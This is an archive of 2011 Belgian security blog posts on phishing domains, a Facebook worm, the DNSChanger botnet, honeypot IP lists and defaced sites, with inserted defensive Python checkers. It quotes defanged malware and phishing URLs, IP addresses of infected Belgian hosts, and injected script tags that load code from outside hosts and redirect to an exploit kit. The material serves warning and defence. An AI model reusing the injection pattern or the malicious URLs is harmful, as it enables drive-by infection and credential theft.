11/30/2011

how not to hide your documents (vlaanderen and controversial projects)

well, someone asked me how to monitor everything that changes on a website

and then I told them that Google is the researcher's best friend

because so many documents and so much information are put online before they become public

and with a few Google tricks you can find them from the moment they are online

today some friends of theirs said in the press that they were against the new plans for the Harbor of Antwerp and told the press that they were very unhappy about the way the plans were being prepared without any popular or democratic consultation

how did they know?

well, it was already all on the website

http://www2.vlaanderen.be/ruimtelijk/grup/00200/00202_00001/index.html

not even on a closed extranet, and not even behind a password

just there for anyone to find, if they could fill in the right search tricks in Google and knew what to look for

it is not because something is not on the front page of the website that it isn't on the website....


11/29/2011

facebook worm: block these sites

links that the bank-stealing facebook worm uses to infect users

do not click on a picture of two blondes

well, in fact, always be very careful about which links you click on facebook

they said that they now had all the necessary security in place

hxxp://www.offi sense.co.il / lang / b.exe

hxxp://www.vinam ost.net
hxxp://www.ferry. coza
hxxp://www.maxim ilian-adam.com
hxxp://www.bacol odhouseandlot.com /
hxxp://www.servi ceuwant.com
hxxp://www.centr alimoveisbonitoms.com.br
hxxp://www.werea d.in.th
hxxp://www.villa matildabb.com
hxxp://www.fiona gh-Bennett-music.co.uk
hxxp://www.uksei katsu.com
hxxp://www.bzoe- salzkammergut.at
hxxp://www.delic escolres.com
hxxp://www.dekie viten.nl


facebook phishing websites

always log in to facebook by typing facebook.com manually in your browser, period

do this also for other important services

clicking on links in mail or on websites is not very intelligent if the service is very important to you

these are dangerous sites, and it is also very strange that people can buy domains with the word facebook or a variant of it in them without having any rights to the name facebook, and that some of the domains are under a European domain extension

http://www.sanagustinturismo.co/Facebook/
http://www.facebook.pcriot.com/login.php
http://deadlyplayerx.binhoster.com/Facebook/securelogin.php
http://facelook.shop.co/login.php
http://sigininto.horizon-host.com/facbook/facebook.php
http://custom-facebook.info/facebook.htm
http://www.profile.co.gp/facebook/photo.phpfbid=12447510&set=a.478812.I41224&type=1&theater.html
http://s6.mywibes.com/facebook.htm
http://www.fjtech.us/
http://myoneid.site90.com/
http://facedook.co.gp/wwwfacebookcomprofilephpid100001548737188.htm
http://faceebook-com.bugs3.com/login/Secured_Re-login/index1.html
http://facebooook.axfree.com/
http://combatarms.free.fr/
http://sweed.web44.net/
http://thekshitij.in/facebook/index1.html
http://addgames.awardspace.biz/
http://www.profile.co.gp/facebook/
http://www.sjscheat.com/Hosting%20blogger/facebook
http://h1.ripway.com/denal/
http://1337r00t.13.ohost.de/r00tw00tkn00wn/
http://faacebok.zapto.org/
http://h4ck3rgadungan.adfoo.info/index1.html
http://www.2498.b.hostable.me/

___________________________________

+ Updated (28.11.2011):

http://www.facebook.reekcreations.com/
http://wvw.facebook.com-photos.php.id.1574348425.jgold.in/
http://fan-pages.vgig.ir/facebook.com.home.php.sk-2361831622.applicationspage/
http://timkoch71.net46.net/1638765386283/facebook/
http://privacy-facebook-it.f11.us/check_privacy.htm
http://www.configsetting.com/facebook/login.htm
http://facebook-beta.kilu.de/facebooklogin.html
http://www.frfacebook.fr/
http://fun4iran.tk/facebook.unfiltered/Index.htm
http://login.eu.nu/facebook/photo.phpfbid=1248427590010&set=a.1292457490730.34590.1809072438&type=1&theater.html

source http://security.web-center.si/?p=75
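A check you can automate for a feed like the one above, added here as an example (it is not code from the original post or from the web-center.si source): it takes the hostname of each URL, compares the registrable domain with the real facebook.com, and then looks in every token of the hostname and path for the brand name or a near-miss of it (one or two character edits, the facelook / facbook / faceebook / facedook trick). The legitimate-domain set and the list of two-label public suffixes are deliberately small assumptions; a real tool would load the full Public Suffix List. The sample URLs in the script are constructed, not the ones listed above.

```python
import re
from urllib.parse import urlparse

BRAND = "facebook"
# Domains the brand really controls (assumption: kept minimal for the example).
LEGIT_DOMAINS = {"facebook.com", "fb.com", "fbcdn.net"}
# Tiny subset of two-label public suffixes; a real tool loads the Public Suffix List.
TWO_LABEL_SUFFIXES = {"co.uk", "com.br", "co.za", "com.au", "co.jp", "co.in"}


def levenshtein(a, b):
    """Edit distance: how many single-character changes turn a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]


def registrable_domain(host):
    """The domain someone actually registered: the last two labels, or three under co.uk-style suffixes."""
    labels = host.lower().rstrip(".").split(".")
    n = 3 if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES else 2
    return ".".join(labels[-n:])


def brand_tokens(text):
    """Alphabetic runs of a host or path, so 'facebook-beta.kilu.de' gives facebook, beta, kilu, de."""
    return re.findall(r"[a-z]+", text.lower())


def classify_url(url, max_distance=2):
    """'legit' if the registrable domain is the brand's own, 'lookalike' if the brand
    name (or a near-miss of it) appears anywhere else in host or path, else 'unrelated'.
    'unrelated' is not 'safe': a phishing page need not mention the brand in its URL."""
    parsed = urlparse(url if "://" in url else "http://" + url)
    host = (parsed.hostname or "").lower()
    if host and registrable_domain(host) in LEGIT_DOMAINS:
        return "legit"
    for token in brand_tokens(host) + brand_tokens(parsed.path):
        if BRAND in token:
            return "lookalike"
        if abs(len(token) - len(BRAND)) <= max_distance and levenshtein(token, BRAND) <= max_distance:
            return "lookalike"
    return "unrelated"


def triage(urls):
    """Group a list of URLs by verdict, e.g. to feed a blocklist or a mail filter."""
    out = {"legit": [], "lookalike": [], "unrelated": []}
    for u in urls:
        out[classify_url(u)].append(u)
    return out


# Constructed sample input, not the URLs from the post.
SAMPLE_URLS = [
    "https://www.facebook.com/login.php",
    "http://facelook.shop.example/login.php",
    "http://www.tourism-site.example/Facebook/",
    "http://facebooook.freehost.example/",
    "http://facebook.com.evil.example/",
    "http://www.unrelated-host.example/",
]

if __name__ == "__main__":
    for verdict, urls in triage(SAMPLE_URLS).items():
        for u in urls:
            print(f"{verdict:10} {u}")
```

The registrable-domain step is what matters: facebook.com.evil.example and wvw.facebook.com-photos.php.id.….jgold.in both contain the brand as a label, and both end up in a domain that is not facebook.com. Treat "unrelated" as "unknown", not as clean.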

 


PWC makes its advertising cybersecurity report public

every year a whole bundle of very expensive paper (or trees) is wasted on so-called reports that are based on so-called interviews or surveys with very knowledgeable people about cybersecurity or one aspect of it

for pwc, fraud prevention and fraud detection are very important, so the whole 'survey' is written as a kind of promotional folder to promote fraud prevention and the other services they offer.

the fact that they do it every year doesn't prove a thing, and that some professor comes along to give it some 'scientific' worth doesn't change a thing

it is publicity and there is nothing in it worth spending time on, and there are a hundred questions one could ask about the way the questions are asked or why only certain aspects of cybersecurity are taken into consideration while others are totally forgotten

http://www.pwc.com/en_GX/gx/economic-crime-survey/assets

but for laughs, some of the conclusions

Fraud, the fraudster and the defrauded

• 34% of respondents experienced economic crime in the last 12 months (up from 30% reported in 2009)
• Almost 1 in 10 who reported fraud suffered losses of more than US$5 million
• Senior executives made up almost half of the respondents who didn't know if their organisation had suffered a fraud
• 56% of respondents said the most serious fraud was an 'inside job'
• Suspicious transaction monitoring has emerged as the most effective fraud detection method (up from 5% in 2009 to 18% in 2011)
• Organisations that have performed fraud risk assessments have detected and reported more frauds.

Cybercrime

• Cybercrime now ranks as one of the top four economic crimes
• Reputational damage is the biggest fear for 40% of respondents
• 60% said their organisation doesn't keep an eye on social media sites
• 2 in 5 respondents had not received any cyber security training
• A quarter of respondents said there is no regular formal review of cybercrime threats by the CEO and the Board
• The majority of respondents are not aware of having, or do not have, a cyber crisis response plan in place

game: find the biggest contradictions between the two lists of results, knowing that a majority of the respondents were management of some kind

 


#belsecparty starting Thursday 1 December, online here

yeah, a real party :)

things to have fun with

or wild things that happen at a party :)

if you have stuff for the party (Belgian stuff, that is)

you can mail it to me

as you see, things are already arriving slowly

you don't have to hack the UN server like the teampoison crew did for the birthday of their crew leader

sending an e-card is also nice (without a virus this time)

for those who are nervous: I am not a hacker and not lulzsec or antisec

but I am pissed off about the general insecurity of Belgian networks and websites

so the time of the omerta is over

every notification to cert.be will have its time limit

just so that you understand

the FCCU is arresting young Belgian teenagers who are hacking or trying to hack from their own PC at home

(they would do better to recruit them for other Belgian state services, like they do everywhere else in the world, .....)

for those who have forgotten

1 million visitors at belsec

around 1 million at the others

10 years in ITsec professionally


Teampoison hacks UN server and starts releasing passwords (also Belgians)

the information has been sent to cert.be

those who know where to search my resources can find the list and file

it shows once again that only two-factor authentication (no, the eID is NOT ready for this, sorry) will have to become the norm - but more about that next week during the #belsecparty (as if this ain't already a party :) )

it shows that nothing is totally secure and that in big and important infrastructures without strict monitoring and policies there is always something that isn't followed up as it should be

it shows that every organisation should have a policy for the case where some of its users' passwords turn up online, or where some of its infrastructure (with its members) is leaked online

in this case the victims will have to change every password that looks like the leaked one on every online service, and their administrators will have to cut all access to external resources as long as they aren't sure that every interaction with that account is normal

what is strange is that Teampoison is normally the anti-#antisec, anti-#lulzsec man, because he tried everything to dox them, to leak information about them and to bring down their servers or websites

You can follow that kind of discussions and actions at twitter.com/mailforlen: look in lists and take the first one, 'leaks and dumps', to which you can subscribe (and should subscribe if you are in intelligence or security). If you think I am missing some twitter accounts that are essential (and do more than only retweeting or bragging without doing something) you can send them or tweet them to me for inclusion

it is normal that teampoison has hacked the UN, because he seems more like the right-wing, anti-islamic, anti-liberal, patriot, shoot-first-and-ask-later type of guy for whom the UN is probably part of a conspiracy.

hacking, ddossing and leaking are just methods that are now available to every nut and activist alike

this is the new revolutionary trend of 2011, and although a lot of people have been arrested or have retired because they fear being arrested, for every 10 arrested there will always pop up somewhere one new one who may make a difference for some time until he also gets arrested

ps the passwords are too short (go to passphrases - long sentences - and that you can do immediately)


tips to stay anonymous on the web as a blogger

the first one being: don't use Google adwords or analytics

• Don't use Google Analytics or any other third-party embed system. If you have to, create a new account with an anonymous email. At the very least, create a separate Analytics account to track the new domain. (From the "My Analytics Accounts" dropdown, select "Create New Account.")
• Turn on domain privacy with your registrar. Better, use a hosted service to avoid domain payments entirely.
• If you're hosting your own blog, don't share IP addresses with any of your existing websites. Ideally, use a completely different host; it's easy to discover sites on neighboring IPs.
• Watch your history. Sites like Whois Source track your history of domain and nameserver changes permanently, and Archive.org may archive old versions of your site. Being the first person to follow your anonymous Twitter account or promote the link could also be a giveaway.
• Is your anonymity a life-or-death situation? Be aware that any service you use, including your own ISP, could be forced to reveal your IP address and account details under a court order. Use shared computers and an anonymous proxy or Tor when blogging to mask your IP address. Here's a good guide.

http://waxy.org/2011/11/google_analytics


#belsecparty exclusive: the list of 1400 Belgian IP addresses infected with the Estonian DNS-changer botnet

this information has been given by Arbor Networks, thanks

this information consists of the Belgian IP addresses that contacted the new clean DNS servers run by the ISC, which now receive all the traffic that was going to the malicious DNS servers of the Estonian gang

these are only the IP addresses that were infected by the malware installed by this gang, and not by any other variant that has gone out since

the FBI, together with a group of private and public American and international institutions, groups and enterprises, stopped the operation after a 2-year investigation

These Belgian IP addresses ARE infected with this botnet and need to be cleaned and secured again.

What is the virus

Instead of infecting your machine with a virus that itself tries to visit a website or server, they only change the DNS settings of your machine, so that you will never notice that you were infected (if nothing else is installed). Some variants also left a mark because they disabled the antivirus on the machines.

DNS is one of the most important parts of the internet because it translates the domain name we all know and type into the number of the server it lives on (the IP address). Imagine that you wouldn't have to type a telephone number into your phone but a name, and that the phone would connect to a server and itself look up the telephone number(s). As servers change often and as websites also change location, it would otherwise be impossible to 'surf' the net.

The DNS servers to use are for this reason listed in the settings of your PC, your router and your network. An attacker can change that setting at any of those places; what he cannot change from there is the server that is authoritative (trusted) for the domain.

Why this virus

It is clear from the description that this is the best way for the underworld to make a lot of money on an industrial scale without having to invest much in vulnerabilities, changing servers and so on. In fact, if you want your victims to go to another server and download or click something, you only have to change it on your own DNS server. This is also the case with the poisoning of a DNS server, where the results for a site are altered (for example the IP address for ebay.be points to a server in Russia and not in the US), but as DNS servers have become better defended and monitored this has become harder.

Who can get this virus

One thing that is clear about this virus is that it has been adapted. It works on Macintosh, Linux, Windows and on routers (home routers or network routers). The only thing it wants to do is redirect all internet traffic through its own malicious DNS servers.

How can I check if I was infected

If you were online on the 28th of November and you aren't in this list, then that is a good sign

You can also check online with the FBI database

https://forms.fbi.gov/check-to-see-if-your-computer-is-us...

If you are infected, the FBI is looking for victims for its court case against these cybercrooks (who made 14 million dollars over 2 years)

https://forms.fbi.gov/dnsmalware (looking for victims)

The malicious DNS ranges are these

 

85.255.112.0 - 85.255.127.255
67.210.0.0 - 67.210.15.255
93.188.160.0 - 93.188.167.255
77.67.83.0 - 77.67.83.255
213.109.64.0 - 213.109.79.255
64.28.176.0 - 64.28.191.255

 

You can find them with the following operations on your machine (for your routers at home and in the enterprise you should look in the documentation).

For networks we would advise you to put these ranges in your DNS rules as blocked and logged, so you can see if any machine in your network has been infected. The best policy is to divert all your DNS traffic to an internal DNS server that forwards all external DNS queries to a few defined external DNS servers. Bad DNS traffic should be logged or sent to the firewall for closer examination.

It is also not a bad idea to install Wireshark or another network traffic monitor and to look for infections. Hosts that are infected will probably also be infected with other malware or botnets.

check DNS settings on Windows: open a command prompt and type "ipconfig /all", then check the DNS Servers field.

check DNS settings on a Mac: choose System Preferences and then select Network. Then click on the Advanced button of the active connection. Users may also want to check the DNS servers used by their router.

check DNS settings on Linux: cat /etc/resolv.conf
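The same check, scripted, as an added example (this is not code from the original post, nor from Arbor, the ISC or the FBI): it parses the resolver settings out of the two commands above ("ipconfig /all" output on an English Windows, /etc/resolv.conf on Linux or a Mac) and tests each resolver against the six ranges listed above, expanded into CIDR networks. The command outputs embedded in the script are constructed samples, not captured from a real machine.

```python
import ipaddress
import re

# The six malicious resolver ranges from the post, as (first, last) addresses.
MALICIOUS_RANGES = [
    ("85.255.112.0", "85.255.127.255"),
    ("67.210.0.0", "67.210.15.255"),
    ("93.188.160.0", "93.188.167.255"),
    ("77.67.83.0", "77.67.83.255"),
    ("213.109.64.0", "213.109.79.255"),
    ("64.28.176.0", "64.28.191.255"),
]

# Turn each first/last pair into CIDR networks once; membership is then a simple test.
MALICIOUS_NETWORKS = [
    net
    for first, last in MALICIOUS_RANGES
    for net in ipaddress.summarize_address_range(
        ipaddress.IPv4Address(first), ipaddress.IPv4Address(last)
    )
]


def is_malicious_resolver(ip):
    """True if the resolver address lies in one of the DNSChanger ranges.
    IPv6 resolvers never match, since the listed ranges are IPv4 only."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in MALICIOUS_NETWORKS)


def resolvers_from_resolv_conf(text):
    """Nameserver lines from /etc/resolv.conf (Linux, also usable on a Mac)."""
    return re.findall(r"^\s*nameserver\s+(\S+)", text, flags=re.MULTILINE)


def resolvers_from_ipconfig(text):
    """'DNS Servers' entries from `ipconfig /all` output (English Windows).
    The first address follows the label; extra resolvers sit on continuation
    lines that contain nothing but an address."""
    servers = []
    in_dns_block = False
    for line in text.splitlines():
        m = re.match(r"\s*DNS Servers[ .]*:\s*(\S+)", line)
        if m:
            servers.append(m.group(1))
            in_dns_block = True
            continue
        if in_dns_block:
            cont = re.match(r"\s+(\d{1,3}(?:\.\d{1,3}){3})\s*$", line)
            if cont:
                servers.append(cont.group(1))
                continue
            in_dns_block = False
    return servers


def check_resolvers(resolvers):
    """Return the configured resolvers that fall inside the malicious ranges."""
    return [r for r in resolvers if is_malicious_resolver(r)]


# Constructed sample command output; not captured from a real machine.
SAMPLE_RESOLV_CONF = """# Generated by NetworkManager
nameserver 85.255.112.36
nameserver 195.238.2.21
"""

SAMPLE_IPCONFIG = """Ethernet adapter Local Area Connection:

   IPv4 Address. . . . . . . . . . . : 192.168.1.20
   DNS Servers . . . . . . . . . . . : 213.109.64.7
                                       93.188.161.2
   NetBIOS over Tcpip. . . . . . . . : Enabled
"""

if __name__ == "__main__":
    for source, resolvers in (
        ("/etc/resolv.conf", resolvers_from_resolv_conf(SAMPLE_RESOLV_CONF)),
        ("ipconfig /all", resolvers_from_ipconfig(SAMPLE_IPCONFIG)),
    ):
        bad = check_resolvers(resolvers)
        verdict = "INFECTED (malicious resolvers %s)" % bad if bad else "clean"
        print("%-17s %s" % (source, verdict))
```

Two caveats: a Dutch or French Windows prints a translated label instead of "DNS Servers", so adapt the regex; and a clean machine behind an infected router still resolves through the gang's servers, so check the router's DNS setting too, exactly as the post says.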

 

How to clean it

For Macintosh you have this free tool

http://macscan.securemac.com/files/DNSChangerRemovalTool....

For Windows there are a bunch of free antivirus tools like Avast and AVG that will do the job. If you install a firewall, you can also add a rule blocking these ranges.

The Belgian list of infected IP addresses, 28th of November

the IP addresses in Excel were a bit of a hassle sometimes, but you only have to read them as an IP address (leaving the ,00 out at the end)

the easiest format to download is Excel

DNS Changer List Ip


11/28/2011

#belsecparty present from Arbor Networks: bad sites and clients on the Belgian internet today

MALICIOUS CLIENTS

Attacking clients
Based on ATLAS honeypot sensors.
81.188.106.89,
62.166.195.172,
80.201.10.160,
109.128.247.183,
84.198.19.2,

Scanning Belgian computers looking for victims
Based on ATLAS honeypot sensors.
85.201.85.208,
130.104.72.213,
134.58.253.55,
62.166.195.172,
109.132.235.135,
87.66.29.248,
81.247.252.210,
81.240.85.87,
134.58.253.57,
91.177.170.44,
81.242.196.34,
81.83.1.205,
87.64.142.48,
81.164.109.187,
109.129.4.123,
80.201.10.160,
85.10.82.156,
87.67.8.112,
91.177.162.184,
87.64.32.187,
83.101.33.81,
81.247.166.83,
109.129.0.66,
84.199.64.130,
193.190.253.146,
91.177.87.184,
85.26.3.28,
80.236.194.51,
85.26.34.179,
87.64.165.5,
78.129.6.138,
85.10.81.71,
78.21.150.79,
87.65.39.242,
194.78.218.172,
87.66.57.148,
83.101.43.178,
85.28.69.102,
109.128.16.176,
91.178.111.72,
91.177.19.225,
91.182.43.197,
84.192.204.59,

Phishing Servers
Based on internal link analysis and third-party reports.
CC, ASN, IP, port, URL
BE, 9031, 85.234.212.11, 80, "http://www.lacavedubailli.be/free.fr/index=1019649346/"
BE, 16276, 87.98.253.10, 80, "http://koletrezzo44.ru/_cp/gate.php"
BE, 39318, 77.73.100.155, 80, "http://www.everyoneweb.com/gratiscreditsvoorhabbo123123/"
BE, 39318, 77.73.100.155, 80, "http://everyoneweb.com/wp/Presentation_tier/Index.aspx?We..."
BE, 16276, 87.98.253.10, 80, "http://koletrezzo55.com/_cp/gate.php"
BE, 16276, 87.98.253.10, 80, "http://koletrezzo44.com/_cp/gate.php"
BE, 6848, 81.82.246.211, 80, "http://d5152f6d3.static.telenet.be/phpmyadmin2/de34df234r..."

Malicious Links
URLs contacted by malware during automated analysis.
Timestamp, CC, ASN, IP, URL
1322493197, BE, 39318, 188.93.153.72, "http://www.fla-ts.be/downloads/Demo_Draaitijd_Fla_lvn.exe"


#belsecparty more announcements (beginning the 1st of December, for 10 days)

we will be closing a whole set of websites and blogs here and over the web and will be republishing the most interesting stuff that was published over time

and where necessary the links will be checked

so look forward to 'going back in time' and 'being reminded of some things' and seeing how

'so little has changed over the years in so many ways'

you may be surprised and find some interesting articles made up from several blog postings combined

I don't think that for Belgians there will be another 'Belgian historical ITsecurity' resource like this

more information will follow

tips, research, publications and other things to add to the party are always welcome

in this land where silence is golden


11/27/2011

Belgian sites of lawyers hacked (in the US)

2011/11/26 DR-MTMRD H M   United States   www.lexadvocaten.be Win 2003 mirror
2011/11/26 DR-MTMRD H M   United States   www.advocaat-leliaert.be Win 2003 mirror
2011/11/26 DR-MTMRD H M   United States   www.versus-advocaten.be Win 2003 mirror
2011/11/26 DR-MTMRD H M   United States   www.advocatentorhout.be Win 2003 mirror

so these Belgian lawyers are hosted in the US and will now see why it is better to be hosted in Belgium, because it will be very difficult to get the logs in time if you go to the FCCU or eCops

secondly, they were hosted on older servers, so their webmaster didn't act as a responsible father and it was only a matter of time until they got hacked

and how can they now be sure that their information wasn't leaked, that clients aren't compromised, or that their communications on and through the websites (and eventually any other linked or logged-in computer) won't be monitored by undiscovered trojans

yeah, maybe far-fetched, but aren't lawyers doing that too.....

it is all technically possible


big Belgian server with numerous school sites hacked

linux - apache

whoever is responsible there thinks that just taking it offline will be sufficient

any personal data lost, maybe?

2011/11/26 SA3D HaCk3D H M   Belgium   campushetspoor.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   atheneumherentals.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   atheneumaalst.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   bs-dewijngaard.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   bswilgenhof.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   bsfaluintjes.be Linux mirror
2011/11/26 SA3D HaCk3D H M R Belgium   alteagenk.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   destadsmus.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   ka-mol.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   sgw28.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   freinetschoollille.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   ictsgr21.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   kaoudenaarde.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   dewatersportschool.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   abrahamhans.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   msliedekerke.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   gibbon-vzw.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   msherentals.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   ktadepanne.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   clb9mechelen.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   dekrekel-degrasspriet.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   cvo-kempen.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   degroenevijver.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   campusmaasland.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   kta-mol.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   debrugerpe-mere.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   internaatkeerbergen.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   dezilverberk.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   ktaliedekerke.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   ibsodehorizon.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   atheneumlokeren.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   bsklavertje.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   omerwattez.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   europaschoolgenk.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   kadenderleeuw.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   sgrdender.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   onderwijswesthoek.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   kaavelgem.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   middenschoolmol.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   freinetherentals.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   horizonaalst.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   verstandig.be Linux mirror
2011/11/26 SA3D HaCk3D H M R Belgium   gitbo.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   toverbeek.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   syn-ack.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   muziekacademieschaarbeek.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   de-zonnewijzer.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   spelenmettechniek.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   mpizonneken.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   campusminneplein.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   ktakapellen.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   bsdepolyglot.be Linux mirror
2011/11/26 SA3D HaCk3D H M   Belgium   kta-zavelenberg.be Linux mirror


play-online.bzh.be hacked and accounts leaked

most of the leaked accounts seem to be Polish or Russian

but it is a Belgian domain name, so the question is who is responsible, because as a Belgian website it falls under Belgian law and so under its privacy laws

another question that may be posed is who will inform those Russian and Polish users that their accounts are leaked and that, if they have used the same passwords for other services, they can be scammed and hacked

is it the website owner, who has left no message on the server that they were hacked

and will they be held accountable

or is it the underfinanced Belgian cert who will have to do that, or contact the Polish and Russian certs to contact the users

and now it is only a small number of accounts, but what if we are talking about thousands of accounts

neither the Belgian cert nor any other cert nor even most of the web services have put any procedure and the necessary resources in place to respond effectively and fast to these situations

and no, I won't show the accounts here, because it is the least I can do (it is Sunday night and the CERT in Belgium is closed)


11/26/2011

#belsecparty already four exclusives waiting for the December festivities

why party?

this year marks 10 years that I have been working in the security side of IT

this year I have been blogging for 7 years about ITsecurity in general, with close to 3 million visits overall

the belsecblog reaches its one millionth reader after 4 years of serving infosearchers for free

over the last year the belsecblog has been working hard to help the innocent Belgians caught up in the Lulzsec campaigns and public leaking of accounts

personally, it is my own birthday and some other things to remember

so for 10 days I will party online

the easiest way to follow the flood of messages, which are programmed to be released every hour of the day during those 10 days, is to follow #belsecparty on twitter from the first of December, or this feed

also

* get download space and jdownloader

* tell your wife to shut up and give you some time to download stuff

* get popcorn, monster drinks and good deep house or 80's waves or gummy funk or latin hot ladies or cool jazz

* clean your screen and get some speakers

* get a tablet to read all those articles and links to books

* set up a second computer ready to use all that security-test software passing by

* keep an eye on the vulnerable Belgian websites passing by

* remember the reposts and releases passing by

* have a look at the hard comments and the setting of the record straight

you can send in stuff as much as you like

anonymity is guaranteed

all releases of new information will be communicated to the CERT some time before

if you receive a message from the CERT that your network or site has a problem and that it will be released between the first and the tenth of December, you'd better follow up on it

but nothing will be a direct and immediate danger to critical infrastructure or financials (they have already busted their own business badly enough)

no files are hosted by me and the uptime of files is not guaranteed

the coming week will be quite calm, as everything is being programmed for Friday to start a week of party and mayhem :) If you know that I am in my forties, you know which movements and music influenced me when I was younger and inspired me (it is not for nothing that the Occupy movement is a cross-generational movement)


11/24/2011

userspace of Belgian ISPs not checked for malware and is a launchbase for malware

although the Belgian ISPs promised that they would secure their infrastructure and their networks themselves if the Belgian parliament didn't enforce the obligation in the new Telecom Law that would oblige them to give every user a free licence for a security package, this doesn't mean that it is done and that they continue to make the necessary efforts

for a few months now we have seen member pages infected with malware and redirect links

not in huge numbers, but enough to get our attention and to be able to say that it wouldn't be a bad idea to virus-scan their own 'userspace' often and to block pages that are unsafe for one reason or another

just as an example

 

skynet

http://safebrowsing.clients.google.com/safebrowsing/

telenet

http://support.clean-mx.de/clean-mx/viruses?id=1091663

chello

http://support.clean-mx.de/clean-mx/viruses?id=1089502


.sys infections (TDL) are becoming more widespread (and tools)

security is a dynamic business

every time you think that you have found the solution and that you can protect your environment, the attacks become so different and the way of infection changes so much that you have to look at new solutions and limitations to keep the same level of security

so when the TDL v* rootkits started infecting .sys files, the antivirus and protection mechanisms weren't ready for it

"They infect a different .sys driver on the system at each infection, and when you try to recover the sys file, it will give you the clean file, and that (besides others) is a common characteristic between them"

this mechanism is now, according to the Internet Storm Center, becoming more widespread

the problem is that your antivirus is not necessarily up to date for this

for this reason you will need to use one (or several, if you are paranoid enough) of these free tools

TDSSKiller.exe - Kaspersky
AntiZeroAccess - Webroot
RootkitRemover - McAfee

the fact that your normal antivirus doesn't show it doesn't necessarily mean that you aren't infected

(this is also a reminder that controlling and filtering your web traffic is necessary if you really want to find infections before they spread or cause havoc)


new malicious link injection and redirection method

1) Phishing email contains a link to a website

2) The website contains four links like:

<h1>WAIT PLEASE</h1>

<h3>Loading...</h3>

<script language="JavaScript" type="text/JavaScript" src="hXXp://www.kvicklyhelsinge[.]dk/js.js"></script>

<script language="JavaScript" type="text/JavaScript" src="hXXp://michellesflowersltd[.]co.uk/js.js"></script>

<script language="JavaScript" type="text/JavaScript" src="hXXp://myescortsdirectory[.]com/js.js"></script>

<script language="JavaScript" type="text/JavaScript" src="hXXp://nitconnect[.]net/js.js"></script>

3) Each js.js contains a redirection to a final website that contains the BH Exploit kit:

-> document.location='hXXp://matocrossing[.]com/main.php?page=206133a43dda613f';

That makes it really easy for the author to update to new websites, and at the same time makes it harder for a takedown
http://isc.sans.edu/diary.html?storyid=12079

so in practice this means the following

* you won't have a simple link injection but a script injection in your website

* if you don't look for this kind of script, it will continue to be dangerous for your users, because even if some of these sites have been taken down or blocked, the attackers can change the ultimate destination at any time (and with some scripting even change it every time it gets blocked or taken down, which we could call fast-flux redirecting; that should be scriptable too and has been used by several viruses over the last years)

this is the reason why you will have to set up a system in which you can log, monitor and alert the security team and/or webmaster about any non-authorized script inclusion (if they can deface it, they can include such scripts)

you can also filter comments and so on by stripping out everything that is code or scripting and only allowing dumb text (this is the cheapest option for comment systems and forums). If someone is interested in the link, he or she will copy-paste it.
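One way to implement the monitoring the previous two paragraphs ask for, added here as an example (it is not code from the original post or from the ISC diary): it parses a page with Python's standard html.parser, lists every external <script src>, and flags any host that is not in an allowlist (the site's own host plus the CDNs you know you use), so the result can be logged and alerted on. Anything that is not a plain http(s) source, such as a data: URI, is always flagged. The last function is the "dumb text only" comment filter from the final paragraph. The page and hostnames embedded below are constructed placeholders modelled on the pattern quoted above.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSourceCollector(HTMLParser):
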